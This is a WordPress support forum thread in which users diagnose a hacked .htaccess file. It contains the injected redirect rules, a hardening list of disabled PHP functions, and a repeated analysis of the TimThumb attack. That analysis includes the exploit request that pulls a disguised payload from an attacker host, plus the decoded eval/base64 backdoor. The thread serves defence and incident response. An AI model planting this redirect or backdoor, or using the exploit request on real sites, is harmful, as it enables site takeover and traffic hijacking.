WordPress › Support » Wp .htaccess is hacked for the 2nd time

Hema Latha
Member
Posted 9 months ago #

Hello,

I'm using the latest version of wp. ie., v3.2.1
Site hosted in Godaddy hosting.

Previously my wp .htaccess was modified by someone,
I removed the code and now again it's modified with the same code.
This code redirects my search engine traffic to some other website.

I have mentioned about this previously here:
http://www.wpsecuritylock.com/wordpress-3-2-gershwin-is-released/comment-page-1/#comment-4687
I really don't know how it's been done.

Please advise me how to prevent this from happening again.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
</IfModule>

duck__boy
Member
Posted 9 months ago #

It's likely that you have some other malicious code somewhere on your site that is changing the .htaccess file, rather that it being hacked twice.

I'd recommend a complete re-install of WP so that you can be sure all the core files are clean. Then if it happens again I'd recommend turning off all plugins and switching to the TwentyEleven theme. If it does not happen again then you have narrowed it down to an issue with your theme or with a plugin.

Thanks.
Hema Latha
Member
Posted 9 months ago #

@duck__boy Thank you.
I will re-install wp from the dashboard and keep posted about this.

Pl don't close this thread.
duck__boy
Member
Posted 9 months ago #

As oppesed to from the Dashboard, I'd actually download the full package and copy it over what you have already - it won't hurt anything in the wp_content folder and only updates your core files (doesn't touch wp-config.php or .htaccess either). That way you know every core file is clean, as opposed to only the ones that were changed for the last update.

Thanks.
Hema Latha
Member
Posted 9 months ago #

Thank you very much duck__boy. I will do it as u advised.
Go Daddy
Member
Posted 9 months ago #

I agree with duck__boy's suggestion, but I also wanted to let you know that you can request a security review by the GoDaddy.com Security Team.

If you ever suspect there has been malicious activity on your site, just fill out this form - http://godaddy.com/securityissue - and your site will be reviewed. Depending the situation, we may clean the code directly, advise you to make certain changes, and/or provide other information that could be helpful to you.

Please don't hesitate to take advantage of this service if and when you need it.
Hema Latha
Member
Posted 9 months ago #

@duck__boy
I have replaced all the core wp files.

@GoDaddy
Thanks for the support.
It's excellent that you help even in wp forums.
I have submitted a review through the link you provided.

Godaddy Incident ID is: 12546944
duck__boy
Member
Posted 9 months ago #

That is pretty good service from GoDaddy actually, hope it helps get the problem sorted.

Thanks.
AITpro
Member
Posted 9 months ago #

@Hema Latha - hi i'm researching this and gathering any info i can find to track the exact hacking method used in this type of hack so if you could provide me with some info that would be great.

Please send a list of all the plugins you were using at the time your site was hacked. email edward[at]ait-pro[dot]com. I don't want to offend any plugin authors or send the wrong message so please do not post that here. Thanks.

Do you use the FileZilla FTP software?

Did you happen to look at the file modified date for your .htaccess file?

I am tracking and investigating some other people's sites that had this exact same hack done to their .htaccess files. The file modified date on the .htaccess files was Tuesday, August 09, 2011, 6:23 PM. Is this about the same time that your .htaccess file was hacked?

Thanks.
Ed
AITpro
Member
Posted 9 months ago #

Hi actually never mind about sending me any info. This was a larger scale attack directed at servers and not individual sites. Thanks.
Hema Latha
Member
Posted 9 months ago #

I got the below reply from Godaddy:

Thank you for contacting Online Support.
The issue in question is due to a compromise on the account
and we recommend that you update the following passwords:

FTP, WordPress Admin, and Database password.

Beyond that,
you will want to review your files for the malicious and clean them out
as we are unable to do so at this point.

-----------------------------------------------------------------------

I have changed my FTP, Wp Admin & DB Password.
Also, I have deleted created a new Admin ID & Deleted the old Admin ID.

-----------------------------------------------------------------------

@AITpro .. I too came across more .htaccess file modified posts in this forum.
Samuel B
moderator
Posted 9 months ago #

http://www.wpsecuritylock.com/blog/
related?
Hema Latha
Member
Posted 9 months ago #

@Samuel B .. Yes.
http://www.wpsecuritylock.com/wordpress-3-2-gershwin-is-released/comment-page-1/#comment-4687
Hema Latha
Member
Posted 9 months ago #

After few searches I came to know that I have change the keys inside wp-config.

Now I changed these keys:

define('AUTH_KEY',
define('SECURE_AUTH_KEY',
define('LOGGED_IN_KEY',
define('NONCE_KEY',

Using the link: http://api.wordpress.org/secret-key/1.1/
which generates random keys.
AITpro
Member
Posted 9 months ago #

@Samuel B - What i was trying to determine was the method of attack by cross referencing several sites that had been compromised. Sites that had .htaccess protection from a direct frontal attack / hack were compromised and after 24 hours of investigations I found that FTP passwords were compromised on all of the other sites. So I guess this info will be important to anyone searching for why / how and what to do about it. This is a very high ranking post (how i came across it) and there is very little info out there since this is a relativly recent attack. The volume of the attack is still unknown, but hopefully it was fairly contained. What i suspect is that a lot of people are not yet aware that their site has been compromised. Thanks.

@Hema Latha - Thank you for emailing me this info as well. 100% confirmation of method of attack / hack.

Yep the WordPress Authentication Unique Keys / Salts will make your DB password pretty much uncrackable.

Thank you again :)
Ed
MickeyRoush
Member
Posted 9 months ago #

I would like to know how this attack works as well. If it uses eval and base64_decode PHP functions, why not disable them via php.ini if your hosts allows it? I know some developers like to use these functions. I know this could possible break your theme or plugins, but it's worth trying. I do not believe any theme or plugin that I currently use, uses these functions, so I have them disable anyways, and they've been disabled for some time with no ill effects. Am I incorrect in doing this? If anyone else can correct me, I would appreciate the 'polite' advice.

Also, since timthumb works with the uploaded images, is that how the malicious code is brought in? Is the payload brought in via an image upload? No one else has provided much more information.
vernonmorris1
Member
Posted 9 months ago #

I had the exact same issue happen to my website which is hosted at godaddy. However, I do not have a wordpress blog on that site, though I do have one on other sites.

I just was wondering if anyone learned anything new about this. It worried me because there is nothing for me to do other than to delete the malicious .htaccess code .
AITpro
Member
Posted 9 months ago #

@MickeyRoush - Yes disabling this function in php.ini would effectively block a lot of hacking methods / scripts / shell scripts from executing, but I think disabling this function in the php.ini disable_functions directive is probably too broad or general a solution. It would most likely cause more harm then good if implemented generally by a lot of people because of the large number of legitimate plugins that are using this php function.

I personally block these general dangerous functions in my php.ini file and they work pretty darn well. ;)

disable_functions = system,exec,passthru,shell_exec,show_source,popen,pclose

I have some other functions that i block as well, but I don't want to list them here because they might break other things. Each person should check what is using what on their websites before disabling php functions in their php.ini file. ;)

I am currently actually focusing on this area of website security because the growing trend of hacking methods / attacks is now to go after the .htaccess files themselves. This is actually a good thing in a way because this means that hackers are realizing even if they find a known vulnerability / exploit that they are not going to be able to exploit it if an .htaccess is in place that will block their attack or exploit methods.

This particular hack was directed at the host servers themselves and .htaccess files that were located in only the document root of the domains on these servers. .htaccess files in subdirectories / subdomains and subsites were not affected. This particular hack was not related to the timthumb vulnerability / exploit.

The timthumb exploit generally works like this. The thumbnailer script is supposed to allow only uploads of image files, but you can get around this in a couple of ways, such as by adding a double file extension to the file name. ie .jpg.php or some other methods. And the optimum payload is a shell script because that gives a hacker full control of your website. They can log into their shell script on your site and do anything they want. It gives them full control of your site with even more site control capabilities then you have with a WP Dashboard. Gnarly ;(

@vernonmorris1 - Yep this method of attack is not based on the website platform itself ie PHP, HTML, etc. It was a direct attack at the host Server level. I have a lot of info gathered about this particular attack and may create a post about it, but what is more important to look at is the latest hacking / trends / methods. Shell scripts have been around for many years, but hackers are now tending to be going after .htaccess files more and more because more and more people are becoming aware of .htaccess website security protection.

Luckily overall this attack came and went very quickly. The Alexa visitor traffic for the domain that this .htaccess hack was redirecting / pointing too spiked to a massive amount of traffic in a 2 day period and then you see that is was completely contained in max 3 days. The Alexa visitor traffic looks like a V turned upside down spanning a 3 day period.

This is what i would call awesome disaster control and containment. There were several web hosts that got nailed, but they all responded with lightening quick response to contain what could have been a real mess. And i imagine that now that they know this paricular method of attack they have implemented security measures that would block this hacking method from working again. It's a never ending battle though. Hackers are constantly looking for and testing new ways to hack into things. It's not just a job, it's an adventure. LOL ;)
Hema Latha
Member
Posted 9 months ago #

@AITpro

Today I was searching for wp security for my blog
and I came across "BulletProof Security".
I was surprised to see that It was created by you.
I immediately installed the plugin and it's amazing ...
"So many features" with excellent explanations for each & every button :)

http://wordpress.org/extend/plugins/bulletproof-security/

I Recommend this plugin.

Thanks.
AITpro
Member
Posted 9 months ago #

@Hema Latha

ha ha ha Excellent choice. Glad you like it and trust me it really works. ;)

My intention of posting here was not to get people to use my plugin. I definitely want to raise awareness in general about website security. If everyone is locking down their websites in shared web hosting envionments then it makes the server safer for everyone. My plugin is automating .htaccess website protection, but .htaccess website security protection has been around forever. One of the problems in the past with website security measures like .htaccess and php.ini was that the information about what to do and how to implement these measures was very vague and cryptic. I see more and more good well explained info about .htaccess and php.ini every day. This is awesome!

I kind of admire hackers in a way, but in the same way that a cop would admire a criminal who pulled off an impressive heist. LOL

Most people complain that I have too much information. Thanks for the kudos on my blabbery (if this is a real word?). Have a great weekend!

Thanks,
Ed
kymora
Member
Posted 9 months ago #

Hello,

For the last 4 weeks something has been adding random code to my htaccess file bring my site down daily. At one point so much traffic was being false sent to my site it brought down my hosting companies server. My site was brought down and I got a warning! Now I have been told that they think my permalinks are corrupt and that every time wordpress access the file to do an update it is rewriting to that file. Not sure what all this means.

I was told that if i did a reinstall of wordpress that I would lose all my files. My hosting company is not really a big help. Can anyone help me with this - I am as green as they come but desperate as I am losing business being down all the time.

A breakdown of what it is doing to my htaccess: adding a single "s" or "ss". Friday it added a <Files php.ini>. It also doubles the wordpress code. We keep renaming the htaccess file and it mostly corrects the problem but only temporarily. The temp fix right now is changing the permissions to 444.

I have turned off and removed most of my plugins.

To try to combat what we thought was a hacker I installed Better WP Security and it redirected my site to the home page and locked me out of my admin login. If things weren't bad enough. I removed it.

I now use SecureLive and they have been great. They are recommending the complete reinstall of WP.

Any help would be greatly appreciated.
AITpro
Member
Posted 9 months ago #

@kymora

Do a complete backup of your site first and download that backup to your computer ASAP. All files and your MySQL database. Xcloner will do this for you in one shot. Xcloner is safe. There was a minor exploit in that plugin many months ago, but it was taken care of.

It is completely outrageous that your web host will not perform a restore from a backup for you, but you can do this yourself without their help. And if you find that your backups already contain the hackers script, well that leaves you no option, but to wipe your site (after you have made a full backup of course) and then reinstall everything "clean" and do a selective restore of only your post data and other content data.

If this is the same attack method that i have seen used on several different web hosts recently and that is specifically targeting .htaccess files then it is very possible that your host has a Server vulnerability that they have not aware of and have not patched it. It is also possible that the hackers are getting in from a direct attack on your individual site or they have cracked your FTP password. I just came across a plugin that has a huge vulnerability in it that would allow unlimited brute force dictionary attacks to crack FTP passwords (no names ;) the plugin author has been notified).

So to determine how they are getting into your site you would need to look at your Apache log files. If they are using a Shell script that is already installed on your site then there will be suspicious log entries. If they are doing any form or remote execution then there will be log entries. If There is nothing unusual at all in your log files then they have probably compromised your host server.

Also look at your PHP Error log for any suspicious php errors. Sometimes the error tells you exactly what they are doing to the code line. ;)

Have you tried locking down your .htaccess files yet.
Add this .htaccess code to all of your .htaccess files.
# Deny Access to protected server files with a dot such as .htaccess and .htpassword
RedirectMatch 403 /\..*$

Also are you using TimThumb or another thumbnailer script and have you patched it yet?

If i have nothing good to say about something or someone then i try to say nothing at all.

On SecureLive..........
LOL
kymora
Member
Posted 9 months ago #

AITpro - you cannot leave me hanging with a LOL after I am paying for this service :) Please don't hold back on my account I would like to hear your thoughts on this service. I am just trying to protect myself in the future. I am not locked into anything.

I don't use TinThumb on this site but I am well aware of that issue.

Thank you kindly for other steps will start the process.

One more thing since SecureLive put a 444 on the htaccess file I haven't had any incidents. What are your thoughts on that? Seriously!
AITpro
Member
Posted 9 months ago #

@kymora
Ok well I have never had any dealings with these folks or tried their services personally, but several people have come to me after their websites were hacked that were using their services. So my assumption was is that they are just selling a dream and do not really offer any sort of website protection that is effective. Like I said I only have the feedback from people that were using them to go on and I really don't even know what kind of service they are offering.

Cool on Timthumb. ;)

yep no prob. ;)

Well yeah a 444 permissions setting will make the file Read Only. Unfortunately, if you are using any plugins that need to write to the .htaccess file then they will no longer work anymore. So just make sure you are not using any plugins or anything else on your site that would need to write to the .htaccess file - This includes WordPress itself if you want to change your custom permalink structure by using WordPress to do this for you, security plugins, caching plugins, bad bot blocking plugins, URL Rewriting plugins, access control plugins, member plugins, spam blocking plugins, password protecting plugins, SEO plugins, etc that need to be able to write to the .htaccess file. You can just use alternative plugins that don't use .htaccess and then just do all of your .htaccess file editing manually via FTP or your Control Panel. ;)

It is always better to locate the true source of a vulnerability instead of putting band aids on things. So really what needs to happen is to track down the method used in the successful penetration. This way you can prevent the problem from occurring again at the source. The reason for this is if a door is open somewhere then it is only a matter of time before the hacker finds another way to dump a payload via the open door. If the door is locked tight then you have removed the vulnerability and not just put a band aid on it. ;)

Give them a try for a while and keep me posted. It is always possible that at some point there was a technical issue or a mistake was made and their service temporarily had problems. They may be great now. The last person to report to me that they had a problem with them was about 2 months ago.

Thanks.
jaybook
Member
Posted 9 months ago #

If you had your htaccess file hacked, here are some simple steps to take your site back:

1)Find and remove all instances of timthumb.php and thumb.php:

Look in your theme and plugin folders for files named timthumb.php and thumb.php.

First places to look:
{root}/wp-content/themes/{all sub folders}
{root}/wp-content/plugins/{all sub folders}

These are legitimate files, but which have security holes in them that allow the attacker to control your site.

A version of timthumb.php is present in the WordPress Most Popular Posts plugin, in the "scripts" sub-directory.

You can delete these files, as they are not usually needed. Before you do so, back them up.

2) Remove timthumb cache sub-directory

Look for a "cache" sub-directory, right below where you found the PHP files above (timthumb.php, or thumb.php). Remove any files stored in there. Either delete the folder, or make it not write-able by your web server.

3)Make your .htaccess file in the root not write-able by the web server

4)Add an additional htaccess password to the wp-admin folder

5)Reset all your passwords:

FTP/SSH, WordPress, and DB password. Make sure they are at least 10 characters long, have letters and numbers, and are in upper and lower case. Also add some special characters ($#%^&*()!@#)
Hema Latha
Member
Posted 9 months ago #

Ok ..

Can someone explain how were they (he/she) able to access my .htaccess ?

Is it site targetted ? Or
Is it platform targetted ?

This is not the first time my blog was hacked.
Earlier my blog was hacked and I had eval base codes in all my php codes.

Why me ????????
jaybook
Member
Posted 9 months ago #
Well, this is how it seems to work:

1)It first scans the site's HTML to find the active theme's folder
2)It looks for the file tinythumb.php in the main theme folder, and makes a request like this:

yoursite.wordpress.com/wp-content/themes/activetheme/tinythumb.php?src=http://{random_string}.flickr.com.dpprc.com/dppadmin/stats.php

This tricks the tinythumb.php script into downloading the file from dpprc.com. It is disguised as a PNG, (with a binary PNG header), but has the following code in it:

[Code moderated as per the Forum Rules. Please use the pastebin]

It's using some sort of encoding to hide its true intent. It's exploiting a feature of the preg_replace function to execute PHP code.

More info:
http://us3.php.net/manual/en/function.preg-replace.php

It first sets up a variable to hold the random string, which is the same as the first part of the attacker's script's URL (before the dot).

The first parameter (reg ex. pattern) of preg_replace evaluates to:
#(.+)#ie

This seems to be a pattern to satisfy the preg_replace function and trigger execution of the attacker's code.
As will become clear, the real purpose of calling the function is execute code, not do a regular expression match.

It's performing a case-insensitive match (the "i" flag), and executing code (the "e" flag).

From http://blog.akilles.org/2008/09/17/preg_replace-in-php-with-e-flag/ :

"The /e flag makes the (quoted) replacement string to be treated as PHP-code, so that one can make more complex regex-replacements in a one-liner."

The pound signs simply denote the start and end of the reg ex pattern, and it's matching everything in the subject "(.+)".

The second parameter (replacement) evaluates to:

@eval("\1");

This seems to be calling the eval function on the entire subject (the third parameter). (It's also suppressing any error messages that may be written to the PHP error log, with the @ symbol.)

The third parameter (the subject) evaluates to:
[ditto]
```
This, in turn evaluates to:
```
if (isset($_GET["cookie"])) {
echo "cookie=4";
if (isset($_POST[$cookey])) @eval(base64_decode($_POST[$cookey]));
exit;
}
`
This code gets saved to the timthumb cache folder.
After the initial request to timthumb.php, here's what I think happens:

The attacker tries to see if the script was saved, by calling it with the "?cookie=xyz" parameter. In this case, it outputs "cookie=4".
Once he's verified that the script is working, he makes a POST request to the script with the POST parameter named "cookey". This allows him to run any PHP code that is base64 encoded and posted to the script.
This is probably how he modifies the htaccess file.

This seems like an extremely sophisticated operation - so, whoever's doing it probably has plenty of time and money. The motive is clearly profit - they're trying to increase the search engine ranking for their site using unethical and illegal techniques.
jaybook
Member
Posted 9 months ago #

The attacker's site seems to be hosted on Fatcow.
miketopher
Member
Posted 9 months ago #

HIGHLY RECOMMEND THAT YOU SCAN YOUR SITE WITH

http://sitecheck.sucuri.net/scanner/

I knew I had a virus on my site, but no website virus scanner detected it!

Accept
http://sitecheck.sucuri.net/scanner/

It also told me what files were hacked and what code in the file needed to be removed.

I suggest you still be careful modifying files.

But from what I can tell my site is clean now.
jaybook
Member
Posted 9 months ago #
Hi - I'm reposting my original comment with links to pastebin, as I can't edit my original comment.

-----
Well, this is how it seems to work:

1)It first scans the site's HTML to find the active theme's folder
2)It looks for the file tinythumb.php in the main theme folder, and makes a request like this:

yoursite.wordpress.com/wp-content/themes/activetheme/tinythumb.php?src=http://{random_string}.flickr.com.dpprc.com/dppadmin/stats.php

This tricks the tinythumb.php script into downloading the file from dpprc.com. It is disguised as a PNG, (with a binary PNG header), but has the following code in it:

http://pastebin.com/MhPh4Lsg

It's using some sort of encoding to hide its true intent. It's exploiting a feature of the preg_replace function to execute PHP code.

More info:
http://us3.php.net/manual/en/function.preg-replace.php

It first sets up a variable to hold the random string, which is the same as the first part of the attacker's script's URL (before the dot).

The first parameter (reg ex. pattern) of preg_replace evaluates to:
#(.+)#ie

This seems to be a pattern to satisfy the preg_replace function and trigger execution of the attacker's code.
As will become clear, the real purpose of calling the function is execute code, not do a regular expression match.

It's performing a case-insensitive match (the "i" flag), and executing code (the "e" flag).

From http://blog.akilles.org/2008/09/17/preg_replace-in-php-with-e-flag/ :

"The /e flag makes the (quoted) replacement string to be treated as PHP-code, so that one can make more complex regex-replacements in a one-liner."

The pound signs simply denote the start and end of the reg ex pattern, and it's matching everything in the subject "(.+)".

The second parameter (replacement) evaluates to:

@eval("\1");

This seems to be calling the eval function on the entire subject (the third parameter). (It's also suppressing any error messages that may be written to the PHP error log, with the @ symbol.)

The third parameter (the subject) evaluates to:
http://pastebin.com/mLRtCakv

This, in turn evaluates to:
```
if (isset($_GET["cookie"])) {
echo "cookie=4";
if (isset($_POST[$cookey])) @eval(base64_decode($_POST[$cookey]));
exit;
}
```
This code gets saved to the timthumb cache folder.
After the initial request to timthumb.php, here's what I think happens:

The attacker tries to see if the script was saved, by calling it with the "?cookie=xyz" parameter. In this case, it outputs "cookie=4".
Once he's verified that the script is working, he makes a POST request to the script with the POST parameter named "cookey". This allows him to run any PHP code that is base64 encoded and posted to the script.
This is probably how he modifies the htaccess file.

This seems like an extremely sophisticated operation - so, whoever's doing it probably has plenty of time and money. The motive is clearly profit - they're trying to increase the search engine ranking for their site using unethical and illegal techniques.

12 Next »

Reply »

You must log in to post.

WordPress.org

Forums

Wp .htaccess is hacked for the 2nd time (50 posts)

Reply »

About this Topic

Tags

Code is Poetry